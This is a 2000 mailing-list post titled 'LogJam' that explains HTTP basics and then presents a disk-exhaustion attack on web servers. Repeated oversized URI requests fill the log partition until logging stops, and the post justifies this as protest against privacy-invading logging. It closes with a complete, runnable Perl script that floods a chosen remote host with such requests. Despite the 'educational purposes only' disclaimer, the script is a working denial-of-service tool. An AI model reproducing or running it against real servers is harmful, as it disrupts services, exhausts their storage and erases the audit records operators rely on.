LogJam Anton STIGLIC Fri, 25 Feb 2000 15:31:25 -0800 LogJam by CryptoPunk The following information is described for the purposes of education only. I do not condone the use of this information for illegal purposes, nor am I responsible for any misuses of this information. INTRO Several web servers are logging every request you are sending them. Your IP address, time and page you asked to retrieve are logged. Some servers go beyond that and will even log the previous web page that referred you to the their page, your e-mail address, the time your mouse stays on a certain image, and more. Web servers are tracing your identity and keeping track of your movement and habits, this is an invasion of your privacy. Think of a web server as being a public grocery store, in society you have the right to go buy a loaf of bread without having the grocery clerk scan you, without revealing for example your telephone number, social insurance number or the store you went to just before. In the same matter, one should be able to surf the web without being traced. LOG FILE Servers that are keeping track of your information store it in a file called a log file. Every request you make can be stored in such a file. Web servers can choose to not log information, and let you surf their pages anonymously, but many prefer to keep track of you. HTTP I'll describe a simple attack to which web servers that log information are vulnerable to, but first let's discuss how Web surfing is done. We surfing is accomplished trough the use of a protocol called HTTP (see RFC2068 for a description). We call a client the person who is requesting information from a web server. The way http works is that a client (usually through the use of a web browser) constructs an http request, which normally contains the URI (Uniform Resource Identifier) and some other information like the version of the http protocol the client understands. So let's say we want to request a web page form a web server foo.server.net. We simply need to create a socket connection to foo.server.net on the port that is used by the server for http (usually 80, so we'll use that in our example). You can manually request a page (say foo.server.net/index.html) by telnet like this: %> telnet foo.server.net/index.html you'll get a telnet prompt, in which you type in the following GET /index.html HTTP/1.0 followed by two carriage returns. This will print out the html page you requested, that's the web page. It's as simple as that. HTTP version 1.1 has some other nice features, like Keep-Alive connections, in which you keep a persistent connection and thus send multiple html requests using the same tcp connection (and the client doesn't need to wait for a response to be able to send his next request, this is called Pipelining). So for example, say we want to fetch /index.html and then introduction.html, we can sent the following command in the telnet prompt: GET /index.html HTTP/1.1 Connection: Keep-Alive Host: foo.server.net GET /introduction.html HTTP/1.1 Connection: Keep-Alive Host: foo.server.net If you wait to long between commands, the server will close the connection. Note the extra Host command, you have to put this in for HTTP/1.1. It's possible that you might mistype a certain command, URI, or whatever. The web servers returns a 3 digit number after each request, numbers of the form 2xx indicate successful requests, numbers of the form 4xx indicate that the client sent a bad request (see RFC2068 for more details). Common errors are 400: Bad Request (means that your request was malformed). 404: Not Found (an URI was given which the server cannot found). 413: Request entity to large. 414: Request-URI Too Large. When is a URI request to large, that depends on the web server, it is not defined in the standard, most servers will accept decently large URI requests, especially if the have some CGI stuff that redirects you to one of many possible web pages. LOG_JAM If a server is logging, he will probably log the URI you request. It most often always logs your IP address, so you are NEVER ANONYMOUS IF you send requests on a clear direct connection. If the web server is snoopy, he'll log a whole bunch of other stuff. By simply requesting html files that have a large URI (or putting in some other headers containing large strings), multiple times, you can force the logging to jam. Just like a tree trunk logs that pile up on a river and block the passage to canoeists. If the web server is not logging, there is no problem, if he is logging, you can fill up his disk partition that contains the logging files and thus force him to stop logging. How big is the partition that contains the log files? That can vary from web server to web server. Small servers may have something like 70 MB allocated for that partition, slightly bigger once may have something like 2GB, bigger once might have something like 36 GB (that's the biggest hard drive I've seen on PIII that are being sold now adays). On my localhost, I've got my log files in a 70 MB partition. By sending multiple URI requests of 7500 bytes (my servers accepts does without giving a 414 error) I could occupy my whole /var partition in about 20 seconds. This is done locally do, throw the Internet, you have to compute in some delay time (you can figure out that delay with information given to you by ping for example). CONCLUSION This attack has been described for educational pruposes and as a social reflection on web servers habbits of logging information.. ######################################################################## # Title: LogJam # Usage: # LogJam --reps NB_REPS --remote R_NAME --port PORT # where NB_REPS is the number of URI requests to send. This amount # will vary depending on the size of the /var partition # of the server. # R_NAME is name of the remote host server, if not given # this will take on the value 'localhost'. # PORT port number, if none given this will take the value # 80. # # Warning: This Perl script is for educational purposes only. # I do not condone the use of this script for illegal # purposes, nor am I responsible for anything that is # done with this script. ######################################################################## #!/usr/local/bin/perl -w require 5.002; use IO::Socket; use Getopt::Long; $MAX_KEEP_ALIVE = 10; # A Keep-Alive connection will die after # a certain amount of bad requests. # This time depends on the sizes of URI # requests you are sending. # 10 worked for me, but this can be modified &GetOptions("reps:i" => \$reps, "remote:s" => \$remote, "port:s" => \$port); if ( ! $remote) { $remote = 'localhost'; } # default to localhost if ( ! $port) { $port = 80; } # default http port is 80 elsif ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); } $iaddr = inet_aton($remote) or die "can't find host: $remote"; $paddr = sockaddr_in($port, $iaddr); $proto = getprotobyname('tcp'); # I made the string size so that a Get request with this URI would # not return a "414" (Request-URI Too Large) on the apache server # I was testing on. The value can be changed, you just want to get # it loged. $uri = "LLL" x 2500; while ($reps --) { socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(SOCK, $paddr) or die "connect: $!"; for ($i = 0; $i < $MAX_KEEP_ALIVE; $i++) { SOCK->autoflush(1); # We'll send an HTTP/1.1 GET request, with Keep-Alive # Other things can be added here (or modified), you can # simply make an HTTP/1.0 request, or put in extra things # that the server might be loging (referels ?) print SOCK "GET /".$uri." HTTP/1.1 \n". "Host: $remote \n". "Connection: Keep-Alive \n". "\n"; } close(SOCK) or die "close: $!"; } print "Sent ($i) blocks of junk to remote host ($remote)\n";